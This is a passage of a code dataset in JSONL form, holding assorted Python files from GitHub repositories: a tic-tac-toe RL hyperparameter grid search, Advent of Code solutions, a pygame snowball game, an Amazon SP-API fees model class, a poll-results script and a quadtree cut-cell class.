quality.\")\n@click.option('-r', '--reproduce-test', \"rtest_cnt\", default=3,\n show_default=True, help=\"Reproducibility test count.\")\ndef gridsearch(quality, rtest_cnt):\n \"\"\"Find and output best hyper-parameters.\n\n Grid search consists of two phase:\n 1. Select best 10 candidates of parameter combination.\n 1. Carry out reproduce test and output top 5 parameters.\n\n Args:\n quality (str): Select preset of parameter combination. High quality\n means more granularity in parameter space.\n rtest_cnt (int): Reproduce test count\n \"\"\"\n st = time.time()\n _gridsearch_candidate(quality)\n _gridsearch_reproduce(rtest_cnt)\n print(\"Finished in {:0.2f} seconds\".format(time.time() - st))\n\n\ndef _gridsearch_reproduce(rtest_cnt):\n \"\"\"Refine parameter combination by reproduce test, and output best 5.\n\n Reproduce test is a learn & bench process from each parameter combination.\n\n 1. Select top 10 parameters from previous step.\n 2. Execute reproduce test.\n 3. Sort by lose rate.\n 4. Output best 5 parameters.\n\n Args:\n rtest_cnt (int): Reproduce test count\n\n Todo:\n Apply multiprocessor worker\n \"\"\"\n print(\"Reproducibility test.\")\n with open(os.path.join(CWD, 'gsmodels/result.json'), 'rt') as fr:\n df = pd.DataFrame([json.loads(line) for line in fr])\n top10_df = df.sort_values(['base_win', 'max_episode'])[:10]\n\n index = []\n vals = []\n # for each candidate\n pbar = _tqdm(total=len(top10_df) * rtest_cnt)\n for idx, row in top10_df.iterrows():\n index.append(idx)\n base_win_sum = 0\n total_play = 0\n # bench repeatedly\n for i in range(rtest_cnt):\n pbar.update()\n learn_episode = row.max_episode\n epsilon = row.epsilon\n alpha = row.alpha\n with NamedTemporaryFile() as tmp:\n res = _learnbench(learn_episode, BENCH_EPISODE_CNT, epsilon,\n alpha, tmp.name, False)\n res = json.loads(res)\n base_win_sum += res['base_win']\n total_play += BENCH_EPISODE_CNT\n lose_pct = float(base_win_sum) / rtest_cnt / total_play * 100\n vals.append(round(lose_pct, 2))\n\n top10_df['lose_pct'] = pd.Series(vals, index=index)\n\n df = top10_df.sort_values(['lose_pct', 'max_episode']).reset_index()[:5]\n print(df[['lose_pct', 'max_episode', 'alpha', 'epsilon', 'model_file']])\n\n\ndef _gridsearch_candidate(quality):\n \"\"\"Select best hyper-parameter candiadates by grid search.\n\n 1. Generate parameter combination by product each parameter space.\n 2. Spawn processors to learn & bench each combination.\n 3. Wait and write result to a file.\n\n Args:\n quality (str): Choice among 'high', 'mid', 'low'\n\n Todo:\n Progress bar estimation is not even.\n \"\"\"\n # disable sub-process's progressbar\n global tqdm\n tqdm = lambda x: x # NOQA\n\n if quality == 'high':\n # high\n epsilons = [e * 0.01 for e in range(8, 25, 2)]\n alphas = [a * 0.1 for a in range(2, 8)]\n episodes = [e for e in range(8000, 31000, 3000)]\n elif quality == 'mid':\n # mid\n epsilons = [e * 0.01 for e in range(10, 20, 5)]\n alphas = [a * 0.1 for a in range(3, 7)]\n episodes = [e for e in range(10000, 30000, 5000)]\n else:\n # low\n epsilons = [e * 0.01 for e in range(9, 13, 2)]\n alphas = [a * 0.1 for a in range(4, 6)]\n episodes = [e for e in range(10000, 25000, 10000)]\n\n alphas = [round(a, 2) for a in alphas]\n _args = list(product(episodes, epsilons, alphas))\n args = []\n for i, arg in enumerate(_args):\n arg = list(arg)\n arg.insert(1, BENCH_EPISODE_CNT) # bench episode count\n arg.append(os.path.join(CWD, 'gsmodels/model_{:03d}.dat'.format(i)))\n arg.append(False) # supress print\n args.append(arg) # model file name\n prev_left = total = len(args)\n\n print(\"Grid search for {} parameter combinations.\".format(total))\n pbar = _tqdm(total=total)\n pool = Pool()\n result = pool.starmap_async(_learnbench, args)\n while True:\n if result.ready():\n break\n if prev_left != result._number_left:\n ucnt = prev_left - result._number_left\n pbar.update(ucnt)\n prev_left = result._number_left\n time.sleep(1)\n\n ucnt = prev_left - result._number_left\n pbar.update(ucnt)\n pbar.close()\n\n with open(os.path.join(CWD, 'gsmodels/result.json'), 'wt') as f:\n for r in result.get():\n f.write('{}\\n'.format(r))\n\n\nif __name__ == '__main__':\n cli()\n","repo_name":"haje01/gym-tictactoe","sub_path":"examples/td_agent.py","file_name":"td_agent.py","file_ext":"py","file_size_in_byte":19004,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"21"} +{"seq_id":"42627332963","text":"from utils import get_top100_list\nfrom utils.melon_crawler import MelonCrawler\n\n\n\nif __name__ == '__main__':\n crawler = MelonCrawler()\n # q = input('검색할 곡 명을 입력해주세요: ')\n # search_song_list = crawler.search_song(q)\n\n\n\n################ top100 list ################\n\n # result = get_top100_list()\n # for i in result:\n # print(i)\n\n\n\n################ song 검색 ################\n\n # song_list = crawler.search_song('기대해')\n # song = song_list[0]\n\n # print(song)\n # print(song.title)\n # print(song.album)\n\n # print(song._lyrics, ': song._lyrics는 None' )\n # # print(song.lyrics)\n #\n # print(song._producers, ': song._producers는 None' )\n # print(song.producers)\n\n\n\n################ artist 검색 ################\n\n # 시도 1\n # # search_artist() # -> Artist를 호출하는 부분이 존재.\n # search_artist를 호출할 경우에 그 안에 다른 부분의 인스턴스를\n # 생성하는 부분 'artist = Artist(~)' 이 있을경우 Artist undefined 에러가 발생\n\n # 시도 2\n # Artist.get_detail() # 인자를 전달해 줘야하는데 방법이 없다.\n\n # 시도 3\n # artist_list = Artist('아이유') # Artist는 인자를 엄청많이 받음, '아이유'만 받는것 검색임.\n # Artist.get_detail(artist_list) # 그리고 이짓안하려고 위에서 Artist인자를 return하는 것\n\n # 시도 4 (성공)\n artist_list = crawler.search_artist('아이유')\n # artist_list = crawler.search_artist('아이유악대')\n # artist_list = crawler.search_artist('걸스데이')\n # artist_list = crawler.search_artist('레드벨벳')\n\n\n#### 1) 아티스트 검색 ####\n\n for i in artist_list:\n print(i)\n\n\n\n\n#### 2) 아티스트의 곡 ####\n\n # artist = artist_list[0]\n # result = artist.get_song()\n # for i in result:\n # print(i)\n\n\n\n#### 3) 아티스트 상세정보 ####\n\n # artist = artist_list[0]\n # artist.get_detail()\n\n\n\n\n\n#### 과제 가이드처럼 그냥 리스트목록을 받는 것으로 했다가\n#### 너무 귀찮아서 그냥 내 방식대로 함.\n#### 1) 아티스트 검색 ####\n# for i in artist_list:\n# print(i)\n# 딕셔너리 형태로 너무 보기 싫어서 아래로 바꿈\n\n# for i in artist_list:\n# for j in i.keys():\n# print(f'{j}: {i.get(j)}')\n# print('')\n","repo_name":"smallbee3/Crawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19648107322","text":"import re \nfrom functools import lru_cache\nfrom collections import deque \nclass Valve:\n def __init__(self, data):\n self.name = data[0]\n self.flow_rate = int(data[1])\n self.connected_valves = data[2:]\n self.is_open = False\n \n def __repr__(self) -> str:\n return f'Name: {self.name}, Flow: {self.flow_rate}, Open: {self.is_open}'\n \n def __str__(self) -> str:\n return self.__repr__()\n\n\nclass ValveGraph:\n #Do highest valves first\n\n def __init__(self, data):\n self.valve_connections: dict[Valve, list[Valve]] = dict()\n for datum in data:\n valve = Valve(datum)\n self.valve_connections[valve] = valve.connected_valves\n self.name_to_valve = { valve.name : valve for valve in self.valve_connections.keys()}\n self.valve_flow_rates = {v : v.flow_rate for v in self.valve_connections.keys()}\n\n @lru_cache(maxsize=None)\n def time_to_open_valve(self, v0, v1):\n #Perform breadth first search\n queue = deque([[v0]])\n visited = set()\n\n if v0 == v1:\n return 0\n\n while queue:\n path = queue.popleft()\n node = path[-1]\n\n if node not in visited:\n connected = node.connected_valves\n\n for conn_valve in connected:\n new_path = list(path)\n new_path.append(self.name_to_valve[conn_valve])\n queue.append(new_path)\n\n if(conn_valve == v1.name):\n return len(new_path) \n\n visited.add(node)\n return None\n\n def get_best_flow_rate(self, minutes: int):\n #get all paths and then join all disjoint sets\n paths = list()\n max_path = {}\n max_flow = 0\n current_valve = self.name_to_valve[\"AA\"]\n valves = [valve[0] for valve in self.valve_flow_rates.items() if valve[1] > 0]\n q = deque([([current_valve], minutes, {})])\n \n while q:\n path, time, valve_open_time = q.pop()\n if time <= 0 or len(path) == len(valves) + 1:\n paths.append([valve_open_time, sum(map(lambda x: x[0].flow_rate * max(x[1], 0), valve_open_time.items()))])\n else:\n for valve in valves:\n if valve not in valve_open_time.keys():\n time_left = time - self.time_to_open_valve(path[-1], valve) \n new_valve_open_time = dict(valve_open_time)\n new_valve_open_time[valve] = time_left\n q.append((path + [valve], time_left, new_valve_open_time))\n\n print(\"got all paths\")\n #sort by flow\n paths.sort(key=lambda p: p[1], reverse=True)\n for valve_path_one, flow_one in paths:\n if(flow_one + paths[0][1] < max_flow):\n return max_flow\n for valve_path_two, flow_two in paths:\n total_flow = flow_one + flow_two\n if(total_flow < max_flow):\n break\n if(valve_path_one.keys().isdisjoint(valve_path_two.keys()) and total_flow > max_flow):\n max_flow = total_flow\n \n def flow_per_minute(self, open_valves):\n flow_released = 0\n for valve in open_valves:\n flow_released += valve.flow_rate\n \n return flow_released\n \nwith open(\"Day16\\Data.txt\") as f:\n valves = [re.findall(r'[A-Z]{2}|[0-9]+', line) for line in f.read().splitlines()]\n\ngraph = ValveGraph(valves)\nmax_flow = graph.get_best_flow_rate(26)\nprint(f\"Answer to Q2: {max_flow}\")","repo_name":"Kodyena/advent-of-code-2022","sub_path":"Day16/Codeb.py","file_name":"Codeb.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8277359131","text":"position = 0\nskip_size = 0\n\nstring = range(0, 256)\nlengths = [14,58,0,116,179,16,1,104,2,254,167,86,255,55,122,244]\n#string = range(0, 5)\n#lengths = [3, 4, 1, 5]\n\nfor l in lengths:\n sublist = []\n starting_position = position\n for i in xrange(l):\n sublist.append(string[position])\n position = (position + 1) % len(string)\n\n sublist.reverse()\n\n position = starting_position\n for i in xrange(l):\n string[position] = sublist[i]\n position = (position + 1) % len(string)\n\n position = (position + skip_size) % len(string)\n skip_size += 1\n\nprint(\"Multiplying first two numbers, %d * %d = %d\" % (string[0], string[1], string[0] * string[1]))\n","repo_name":"mch/advent-of-code","sub_path":"day-10.py","file_name":"day-10.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34217704233","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nbr = '../results/WMT18_Results/'\nbdf = pd.read_csv(br + 'BLEU_scores.tsv', sep='\\t')\nedf = pd.read_csv(br + 'scores_almost.tsv', sep='\\t')\n\nbz = bdf.columns.to_list()\nez = edf.columns.to_list()\n\nassert bz[:3] == ez[:3], \"First 2 elements must be same in both lists\"\nassert bz[-1] == ez[-1], \"Last element must be same in both lists\"\n\nfin = bz[:2]\nfin += bz[2:-1]\nfin += ez[2:-1]\nfin += [bz[-1]]\n\nassert len(edf['SYSTEM']) == len(bdf['SYSTEM']), \"Both dfs have different number of systems\"\n\nout = []\nfor i in range(len(edf['SYSTEM'])):\n\tsubdf = bdf.loc[(bdf['LP'] == edf['LP'][i]) & (bdf['SYSTEM'] == edf['SYSTEM'][i])]\n\ttemp = subdf.values.tolist()[0][:-1] + edf.loc[i].to_list()[2:]\n\t# print(temp)\n\tout.append(temp)\n\nndf = pd.DataFrame(out, columns=fin)\nndf.to_csv(\"scores_all.tsv\", sep=\"\\t\", index=False, header=True)\n\n#####################################################################\n\nbdf = pd.read_csv(br + 'BLEU_corr.tsv', sep='\\t')\nedf = pd.read_csv(br + 'corr_almost.tsv', sep='\\t')\n\nfdf = pd.DataFrame(columns=edf.columns.to_list())\nfor col in edf.columns.to_list():\n\tfin = pd.concat([bdf[col], edf[col]])\n\tfdf[col] = fin\n\nfdf.reset_index(drop=True, inplace=True)\nfdf.to_csv(\"corr_all.tsv\", sep=\"\\t\", index=False, header=True)\n\n#####################################################################\n","repo_name":"EshwarSR/AutomaticEvaluationMetrics","sub_path":"postproc/result_merge.py","file_name":"result_merge.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38527111136","text":"# 1859_백만장자프로젝트_서울2반_이민웅\n\nT = int(input())\n\nfor tc in range(1, T+1):\n N = int(input())\n cost_li = list(map(int, input().split()))\n cost_li2 = list(map(int, input().split()))[::-1]\n stack = []\n # profit = 0\n # idx_b = N-1\n # max_value = 0\n #\n # while idx_b >= 0:\n # if not stack:\n # stack.append(cost_li[idx_b])\n # max_value = cost_li[idx_b]\n # else:\n # if cost_li[idx_b] > max_value and cost_li[idx_b] > stack[-1]:\n # while stack:\n # profit += (max_value - stack.pop())\n # max_value = cost_li[idx_b]\n # stack.append(cost_li[idx_b])\n # else:\n # stack.append(cost_li[idx_b])\n # idx_b -= 1\n #\n # while stack:\n # profit += (max_value - stack.pop())\n ''' 앞부터 뒤로\n i = ans = 0\n while i < N:\n i_mx = i\n for j in range(i+1, N):\n if cost_li[i_mx] 시간차이 많이남\n ans = mx = 0\n for value in cost_li2:\n if mx > value:\n ans += mx-value\n else:\n mx = value\n\n print(f'#{tc} {ans}')\n","repo_name":"MinWoongL/Algorithm_Study","sub_path":"SWEA/Algorithm/230217/millionaire-project.py","file_name":"millionaire-project.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75038699253","text":"def solution(board, skill):\n answer = 0\n \n rows = len(board)\n cols = len(board[0])\n \n save = [[0] * (cols + 1) for _ in range(rows + 1)]\n \n for t, r1, c1, r2, c2, degree in skill:\n if t == 1: # down\n degree = -degree\n \n save[r1][c1] += degree\n save[r1][c2+1] += -degree\n save[r2+1][c1] += -degree\n save[r2+1][c2+1] += degree\n \n for row in range(rows):\n for col in range(1,cols):\n save[row][col] += save[row][col-1]\n \n for col in range(cols):\n for row in range(1,rows):\n save[row][col] += save[row-1][col]\n \n for row in range(rows):\n for col in range(cols):\n if board[row][col] + save[row][col] > 0:\n answer += 1\n \n return answer","repo_name":"Sh-IT0311/Coding-Test","sub_path":"programmers/level3/파괴되지 않은 건물.py","file_name":"파괴되지 않은 건물.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45842111614","text":"import pygame\nimport spritesheet\nimport itertools\nfrom pygame.locals import (\n K_UP,\n K_DOWN,\n K_LEFT,\n K_RIGHT,\n K_ESCAPE,\n KEYDOWN,\n QUIT,\n)\n\n\nclass Game:\n def __init__(self) -> None:\n self.window_surface = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n pygame.display.set_caption(\"Snowly Roller\")\n self.x = 500.0\n self.y = 500.0\n self.fps = 60\n self.clock = pygame.time.Clock()\n self.init_time = pygame.time.get_ticks()\n self.player = spritesheet.Player()\n self.snowball = spritesheet.Snowball()\n self.terrain = spritesheet.Terrain()\n self.grass = pygame.image.load('images/Grass.png').convert_alpha()\n\n def setup_background(self): \n self.window_surface.blit(self.terrain.land_list[self.terrain.landframe], (162, 90)) \n brick_width, brick_height = self.terrain.land_list[self.terrain.landframe].get_width(), self.terrain.land_list[self.terrain.landframe].get_height()\n for self.x,self.y in itertools.product(range(0,1920+1,brick_width), range(0,1080+1,brick_height)):\n self.window_surface.blit(self.terrain.land_list[self.terrain.landframe], (self.x, self.y)) \n\n def run(self):\n running = True\n while running:\n # drawing stuff\n self.window_surface.blit(self.grass, (0, 0))\n self.setup_background()\n self.window_surface.blit(self.player.animation_list[self.player.action][self.player.frame], (self.x, y))\n self.window_surface.blit(self.snowball.snow_list[self.snowball.frame], (self.x + self.snowball.x, y + self.snowball.y))\n # handling events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT or event.key == pygame.K_UP or event.key == pygame.K_DOWN:\n self.player.is_moving = False\n self.player.frame = 0\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n if event.key == K_UP:\n self.player.action = 1\n self.player.frame = 0\n self.snowball.x = 17\n self.snowball.y = -12\n if event.key == K_LEFT:\n self.player.action = 2\n self.player.frame = 0\n self.snowball.x = -22\n self.snowball.y = 23\n if event.key == K_DOWN:\n self.player.action = 3\n self.player.frame = 0\n self.snowball.x = 22\n self.snowball.y = 62\n if event.key == K_RIGHT:\n self.player.action = 0\n self.player.frame = 0\n self.snowball.x = 65\n self.snowball.y = 24 \n elif event.type == QUIT:\n running = False \n\n key_pressed_is = pygame.key.get_pressed() \n if key_pressed_is[K_LEFT] and self.x > 200:\n self.x -= 10\n self.player.is_moving = True\n if key_pressed_is[K_RIGHT] and self.x < 1640:\n self.x += 10\n self.player.is_moving = True\n if key_pressed_is[K_UP] and y > 100:\n self.y -= 10\n self.player.is_moving = True\n if key_pressed_is[K_DOWN] and y < 880:\n self.y += 10\n self.player.is_moving = True \n\n current_time = pygame.time.get_ticks()\n if current_time - self.init_time >= self.player.animation_cooldown:\n if self.player.is_moving:\n self.player.frame += 1\n self.snowball.frame += 1\n self.init_time = current_time\n if self.player.frame >= len(self.player.animation_list[self.player.action]):\n self.player.frame = 0\n if self.snowball.frame >= len(self.snowball.snow_list):\n self.snowball.frame = 0 \n\n self.clock.tick(self.fps)\n pygame.display.update() \n pygame.quit() \n\n\n def update(self):\n # This function should be called for every loop through the main game loop.\n # It should tell every object to update itself.\n # You may end up needing to pass variables to the objects for them to update properly. For instance, player inputs.\n pass\n\n def draw(self):\n # This function should be called every loop through the main game loop.\n # This should tell every object to draw itself.\n # You may have to pass the surface you want objects to draw themselves on to.\n pass\n\n\nif __name__ == \"__main__\":\n SCREEN_WIDTH, SCREEN_HEIGHT = 1920, 1080\n pygame.init()\n Game()","repo_name":"SnoozingPinata/reddit-help","sub_path":"thexerox123/SnowlyRoller.py","file_name":"SnowlyRoller.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33899130143","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.fees_estimate import FeesEstimate\n from ..models.fees_estimate_error import FeesEstimateError\n from ..models.fees_estimate_identifier import FeesEstimateIdentifier\n\n\nT = TypeVar(\"T\", bound=\"FeesEstimateResult\")\n\n\n@attr.s(auto_attribs=True)\nclass FeesEstimateResult:\n r\"\"\"An item identifier and the estimated fees for the item.\n\n Attributes:\n status (Union[Unset, str]): The status of the fee request. Possible values: Success, ClientError, ServiceError.\n fees_estimate_identifier (Union[Unset, FeesEstimateIdentifier]): An item identifier, marketplace, time of\n request, and other details that identify an estimate.\n fees_estimate (Union[Unset, FeesEstimate]): The total estimated fees for an item and a list of details.\n error (Union[Unset, FeesEstimateError]): An unexpected error occurred during this operation.\n \"\"\"\n\n status: Union[Unset, str] = UNSET\n fees_estimate_identifier: Union[Unset, \"FeesEstimateIdentifier\"] = UNSET\n fees_estimate: Union[Unset, \"FeesEstimate\"] = UNSET\n error: Union[Unset, \"FeesEstimateError\"] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n status = self.status\n fees_estimate_identifier: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.fees_estimate_identifier, Unset):\n fees_estimate_identifier = self.fees_estimate_identifier.to_dict()\n\n fees_estimate: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.fees_estimate, Unset):\n fees_estimate = self.fees_estimate.to_dict()\n\n error: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.error, Unset):\n error = self.error.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if status is not UNSET:\n field_dict[\"Status\"] = status\n if fees_estimate_identifier is not UNSET:\n field_dict[\"FeesEstimateIdentifier\"] = fees_estimate_identifier\n if fees_estimate is not UNSET:\n field_dict[\"FeesEstimate\"] = fees_estimate\n if error is not UNSET:\n field_dict[\"Error\"] = error\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.fees_estimate import FeesEstimate\n from ..models.fees_estimate_error import FeesEstimateError\n from ..models.fees_estimate_identifier import FeesEstimateIdentifier\n\n d = src_dict.copy()\n status = d.pop(\"Status\", UNSET)\n\n _fees_estimate_identifier = d.pop(\"FeesEstimateIdentifier\", UNSET)\n fees_estimate_identifier: Union[Unset, FeesEstimateIdentifier]\n if isinstance(_fees_estimate_identifier, Unset):\n fees_estimate_identifier = UNSET\n else:\n fees_estimate_identifier = FeesEstimateIdentifier.from_dict(_fees_estimate_identifier)\n\n _fees_estimate = d.pop(\"FeesEstimate\", UNSET)\n fees_estimate: Union[Unset, FeesEstimate]\n if isinstance(_fees_estimate, Unset):\n fees_estimate = UNSET\n else:\n fees_estimate = FeesEstimate.from_dict(_fees_estimate)\n\n _error = d.pop(\"Error\", UNSET)\n error: Union[Unset, FeesEstimateError]\n if isinstance(_error, Unset):\n error = UNSET\n else:\n error = FeesEstimateError.from_dict(_error)\n\n result = cls(\n status=status,\n fees_estimate_identifier=fees_estimate_identifier,\n fees_estimate=fees_estimate,\n error=error,\n )\n\n result.additional_properties = d\n return result\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"milyord/sp-api","sub_path":"sp/product_fees_v0/models/fees_estimate_result.py","file_name":"fees_estimate_result.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2443628760","text":"import re\na = list(map(int, re.findall(r\"\\S+\", input())))\nb = list(map(int, re.findall(r\"\\S+\", input())))\nsumm=[0]*1\nsumm[0]=b[0]\nfor i in range(len(b)-1):\n summ.append(summ[i]+b[i+1])\nbruh=0\na0=0\na1=a[1]\nbz=summ[a[1]]\nif bz==a[2]:\n print(1)\nelse:\n for i in range(a[1]+1, len(summ)):\n if summ[i]- summ[i-a[1]-1]==a[2]:\n bz=i\n bruh=1\n break\n if bruh == 0:\n print(0)\n else:\n print(i-a[1]+1)\n\n","repo_name":"aminealist/Olympiad-programming","sub_path":"Informatics/1583.py","file_name":"1583.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13162111306","text":"# This is the solution to run for the PyPoll assignment\nimport os\nimport csv\nimport operator\n\n# Lists to store data\nvoters = []\ncounty = []\ncandidate = []\nkhan_vote_count = []\nli_vote_count = []\ncorrey_vote_count = []\notooley_vote_count = []\n\n# Set path for file\ncsv_poll_data = os.path.join(\"..\", \"Resources\", \"election_data.csv\")\n\n# Open the CSV\nwith open(csv_poll_data) as voting_data:\n csv_reader = csv.reader(voting_data, delimiter=\",\")\n\n # Reads & prints header row in CSV file\n csv_header = next(csv_reader)\n #print(f\"CSV Header: {csv_header}\")\n\n # Create lists for data in file\n for row in csv_reader:\n \n voters.append(row[0])\n\n county.append(row[1])\n\n candidate.append(row[2])\n\n# Find the total number of votes.\ntotal_votes = len(voters)\n\n\n# Create a list of unique counties.\ncounty_list = set(county)\n\n\n# Create a list of unique candidates.\ncandidate_list = set(candidate)\n\n\n# Create a dictionary for all lists\ncandidate_data = dict(zip(voters,candidate))\n\n\n# Count the total number of votes for each candidate\nfor x in candidate_data:\n if(candidate_data[x] == \"Khan\"):\n khan_vote_count.append(candidate_data[x])\n elif(candidate_data[x] == \"Correy\"):\n correy_vote_count.append(candidate_data[x])\n elif(candidate_data[x] == \"Li\"):\n li_vote_count.append(candidate_data[x])\n else:\n otooley_vote_count.append(candidate_data[x])\n \n\n# Determines the percentage of the total vote each candidate received.\nvotes_for_khan = len(khan_vote_count)\nvotes_for_correy = len(correy_vote_count)\nvotes_for_li = len(li_vote_count)\nvotes_for_otooley = len(otooley_vote_count)\n\nkhan_vote_pct = \"{:.3%}\".format(votes_for_khan / total_votes)\ncorrey_vote_pct = \"{:.3%}\".format(votes_for_correy / total_votes)\nli_vote_pct = \"{:.3%}\".format(votes_for_li / total_votes)\notooley_vote_pct = \"{:.3%}\".format(votes_for_otooley / total_votes)\n\n\n# Create a dictionary that lists the candidate and their total vote counts.\nvote_summary = {\"Khan\": [votes_for_khan], \"Correy\": [votes_for_correy], \"Li\": [votes_for_li], \"O'Tooley\": [votes_for_otooley]}\n\n# Determines the winner of the election by finding the candidate with the greatest number of votes.\nwinner = max(vote_summary,key = vote_summary.get)\n\n\n# Prints the output in the terminal\nprint(\"\")\nprint(\"Election Results\")\nprint(\"----------------------------\")\nprint(f\"Total Votes: {total_votes}\")\nprint(\"----------------------------\")\nprint(f\"Khan: {khan_vote_pct}: ({votes_for_khan})\")\nprint(f\"Correy: {correy_vote_pct}: ({votes_for_correy})\")\nprint(f\"Li: {li_vote_pct}: ({votes_for_li})\")\nprint(f\"O'Tooley: {otooley_vote_pct}: ({votes_for_otooley})\")\nprint(\"----------------------------\")\nprint(f\"Winner: {winner}\")\nprint(\"----------------------------\")\n\n\n# File path to write to\noutput_path = os.path.join(\"..\", \"Analysis\", \"pypoll_results.csv\")\n\n# Open the file using \"write\" mode. Specify the variable to hold the contents\nwith open(output_path, \"w\") as csvfile:\n\n csvwriter = csv.writer(csvfile, delimiter=',')\n\n csvwriter.writerow([\"Election Results\"])\n csvwriter.writerow([\"Total Votes\", \"Votes For Khan\", \"Khan Vote Pct\", \"Votes For Correy\", \"Correy Vote Pct\", \"Votes For Li\", \"Li Vote Pct\", \"Votes For O'Tooley\", \"O'Tooley Vote Pct\", \"Winner\"])\n csvwriter.writerow([total_votes, votes_for_khan, khan_vote_pct, votes_for_correy, correy_vote_pct, votes_for_li, li_vote_pct, votes_for_otooley, otooley_vote_pct, winner])\n","repo_name":"Efritch/python-challenge","sub_path":"PyPoll/pypoll_main.py","file_name":"pypoll_main.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16108546315","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nEach cut element is an instance of the class QuadTree\n\"\"\"\n#%%\n\nfrom shapely.geometry import box\nfrom matplotlib import pyplot as plt\n\n#%%\n\nLeaves=[]\ntemp=[]\nLabel = []\n\nclass QuadTree():\n \n \"\"\"\n Convention is:\n myChildren[0] = SW myChildren[1] = SE\n myChildren[2] = NE myChildren[3] = NW\n \n \"\"\"\n #Nodes and Leaves Counter\n myNoOfNodes = 0\n myNoOfLeaves = 0\n Integ_Input= []\n \n \n def __init__(self,CutCellNum,Phy_domain, xmin, ymin, xmax, ymax, father, level, stringCode,ID):\n self.ElementNum=CutCellNum\n self.Domain=Phy_domain\n self.myXmin = xmin\n self.myYmin = ymin\n self.myXmax = xmax\n self.myYmax = ymax\n self.myfather = father\n self.myLevel = level\n self.myStringCode = stringCode\n self.myChildren = None\n self.myCell = box(xmin, ymin, xmax, ymax)\n self.ID = ID\n self.label = []\n QuadTree.myNoOfNodes+=1\n \t \n \n def divideMe(self):\n \"\"\"\n This function creates 4 new objects of type Quadtree\n \n Input : The current object\n Output : None\n \n \"\"\" \n self.middleX = 0.5 * (self.myXmax + self.myXmin)\n self.middleY = 0.5 * (self.myYmax + self.myYmin)\n self.myChildren = [QuadTree(self.ElementNum, self.Domain,self.myXmin, self.myYmin, self.middleX, self.middleY, self, self.myLevel + 1, \"0\",1),\n QuadTree(self.ElementNum, self.Domain,self.middleX, self.myYmin, self.myXmax, self.middleY, self, self.myLevel + 1, \"0\",2),\n QuadTree(self.ElementNum, self.Domain,self.middleX, self.middleY, self.myXmax, self.myYmax, self, self.myLevel + 1, \"0\",3),\n QuadTree(self.ElementNum, self.Domain,self.myXmin, self.middleY, self.middleX, self.myYmax, self, self.myLevel + 1, \"0\",4)] \n for i in range (0,4):\n self.myChildren[i].Integration_Input() \n \n \n def amIcut(self):\n \"\"\"\n This function checks whether the current object (cut element's leaf) is cut\n The object's string code is updated as follows\n # 0 = totally outside\n # 1 = totally inside\n # 2 = cut \n \n Input : The current object\n Output : A Boolen (0 or 1)\n \n \"\"\"\n \n if self.Domain.contains(self.myCell):\n self.myStringCode = '1'\n return False\n \n elif self.myCell.intersects(self.Domain):\n self.myStringCode = '2'\n return True\n \n else:\n self.myStringCode = '0'\n return False\n\n \n def generateQuadtree(self, maxLevel):\n \"\"\"\n This functions generates quadtree for the cut element recursively till the specified depth\n \n Input : Current Object & The depth to which Quad-tree is to be performed\n Output : None\n \n \"\"\" \n if (self.myLevel < maxLevel and self.amIcut()):\n self.divideMe()\n for children in self.myChildren:\n children.generateQuadtree(maxLevel)\n \n \n def Get_myNoOfLeaves(self):\n \"\"\"\n This function returns number of leaves for a cut element\n \n Input : The cut element object\n Output : Number of leaves for the cut element\n \n \"\"\" \n if (self.myChildren!= None):\n for children in self.myChildren:\n children.Return_Leaves_list()\n else:\n QuadTree.myNoOfLeaves+=1\n \n return QuadTree.myNoOfLeaves\n \n \n def Return_Leaves_list(self):\n \"\"\"\n This function returns the minimum and maximum bounds for each leaf of a cut element\n \n Input : The cut element object\n 